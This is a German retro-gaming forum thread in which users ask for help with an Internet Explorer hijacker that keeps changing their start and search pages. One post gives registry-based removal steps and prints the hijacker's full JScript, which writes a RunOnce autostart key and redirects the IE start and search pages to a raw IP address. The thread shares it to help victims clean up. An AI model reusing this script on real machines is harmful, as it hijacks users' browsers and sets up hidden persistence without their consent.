Willkommen im cgboard - classic games Forum! Deine gemütliche Retro Gaming Community. Besuche uns auch im Discord Chat.

iexplorer suchseite geändert, H-E-L-P
#1
0
hiho, seit ich diesen dummen trojaner oder was das iss auf meinem pc hatte wurde mir immer wieder die startseite geändert.
das iss zwar net schlimm, aber nun iss auch noch die suchseite anders, nicht mehr msn, sonder das:
http://www.lookfor.cc/
solange das so falsch iss kann ich nimmer auf meinen router zugreifen, weil er immer die suchseite öffnet, wenn ich 192.168.0.1 öffne, also: HELP
Ein Betriebssystem sie zu knechten, sie alle zu finden, ins Dunkle zu treiben und ewig zu binden, im Lande Microsoft, wo die Schatten drohn.
(Bill Gates - Herr der Rechner)
Hasse dich nicht schon am frühen morgen!
Schlaf bis Mittag!
win98 - der grösste virus der welt
Zitieren
#2
0
bei mir ist es globe-finder.cc
die startseite kann ich auf google.com zb ändern, das hält auch, nur auf about:blank darf man sie nicht geben.
den rest weiß ich net wie ich wegbekomm.
adaware findet nix, 5 virenscanner finden nix, registry gesäubert, auch nix.
und der Himmel wird beben..
Zitieren
#3
0
jaja, da hast du auch alles versucht was ich evrsucht habe...

ich allerdings habs schon mal mit voodoo ausprobiert^^
aber, wie sollte die puppe aussehen?
Ein Betriebssystem sie zu knechten, sie alle zu finden, ins Dunkle zu treiben und ewig zu binden, im Lande Microsoft, wo die Schatten drohn.
(Bill Gates - Herr der Rechner)
Hasse dich nicht schon am frühen morgen!
Schlaf bis Mittag!
win98 - der grösste virus der welt
Zitieren
#4
0
Habt ihr schonmal versucht den I-Net explorer neu zu installieren?
Cheers, Beast-King
Und immer schön fröhlich!  Big Grin
Zitieren
#5
0
hier wird einem geholfen:
spotlight.de

daraus habe ich folgenden lösungsvorschlag:

1. Öffne deine Registrierung mit "START -> Ausführen" und gib "regedit" ein.

2. Sichere aber deine Registrierungsdatei vorher. Über Datei Regdaten exportieren o. so ähnlich.

3. Unter
"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\"
müsste ein Schlüssel "tlc" mit einem Wert "c:\\windows\\update911.js" oder so ähnlich stehen. Lösche diesen Schlüssel "tlc" (Mit Maus rechtsklick dann auf Löschen, und dies Bestätigen)

4. Nun schließe die Registrierung wieder, und gebe unter "START -> Ausführen" "c:\\windows" ein. Damit öffnet sich der Explorer mit dem Verzeichniss "Windows", hier suchst du die Datei die in der Registrierung im Schlüssel "tlc" stand. (Bei mir war es "update911.js") Diese Datei solltest Du löschen.

5. IE öffnen unter Interneteinstellungen deine Startseite festlegen und dann den Rechner neustarten. Das Problem sollte gelöst sein.

Hinweis: Da der Autostarteintrag in der Registrierung unter "RunOnce" stand, wird die Datei mit "msconfig" nicht aufgeführt.

Hier noch der Inhalt der Datei, die die Startseite ständig änderte:

var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\tlc",filepath);
Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page",url);
Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Search Page",url);
Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Search Bar",burl);
Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Use SearchAsst","no");
Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Use Custom Search URL",1,"REG_DWORD");

gruss an Sennah, der bereitsteller dieser faq, hat mir auf jedenfall geholfen...

was das mit der suvchseit allerdings immernoch nicht behebt


EDIT:
JAHAHA, bei ut würfde jetzt ne 5 minuten schlaufe von "G-O-D-L-I-K-E" laufen, denn das mit der startseite habsch sleber hingekricht...
man gehe in den anwenungs ordner des momentanen users(C:\\Dokumente und Einstellungen\\Wesley\\Anwendungsdaten) und suche da nach nem folder iefeats.
da sind 2 dlls drind
die dll "iefeatsl.dll" sucht man dann in der registry, und löscht alles was man findet, dann neustarten und den iefeats ordner auchnoch löschen, feddich, allerdings muss man dann noch seine suchseite per hand auf die standartseite zurücksetzen, was bei mir schiefgegangen iss...

nu habsch keine suchseiten mehr
ver-dammt
Ein Betriebssystem sie zu knechten, sie alle zu finden, ins Dunkle zu treiben und ewig zu binden, im Lande Microsoft, wo die Schatten drohn.
(Bill Gates - Herr der Rechner)
Hasse dich nicht schon am frühen morgen!
Schlaf bis Mittag!
win98 - der grösste virus der welt
Zitieren
#6
0
bei mir gibts weder diese datei, noch den registry key
und der Himmel wird beben..
Zitieren
#7
0
Bei mir gibts beides auch nich ich hebr nich nur das problem sondern kommen bei mir auch immer irgendwelche Popups bei Seiten von denen ich genau weiß das sie keine Werbepopups haben z.B. T-online,Cg Board, Ebay usw.
Dabei hab ich doch Alles nach Viren usw. Durschsucht und zwar mit Kaspersky und Norton (Beides neuste Version)
[Bild: banner_cool3zhjth.jpg]
Zitieren
#8
0
Ich habe das komische Problem, das manche Wörter im IE Explorer einfach als Link anwählbar sind.

In D2001 Beitrag über mir, sind die Wörter Ebay und Norton als Link anwählbar. Da komme ich dann immer auf http://www.coolwebsearch.com

und http://www.chip.de läd er komplett aus und dann kommt eine Fehlermeldung, das es abgebrochen wird.

Oder bei .de.vu Seiten läd er diese auch komplett aus und dann bekomme ich eine leere weise Seite angezeigt. Fertig...
Aber auch wenn ich mich bei http://www.web.de einlogge... dann lädt der erst das E-mail dingsbums und dann bekomme ich auch en weisses Bild

Ich habe dann mal den I-Net Explorer neu installiert... und dann gings eine Zeit lang... und nun habe ich es nochmal versucht.. aber nu ist es wieder so...

HILFE!!!

PS: Habe gerade erst Formatiert!
Cheers, Beast-King
Und immer schön fröhlich!  Big Grin
Zitieren


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste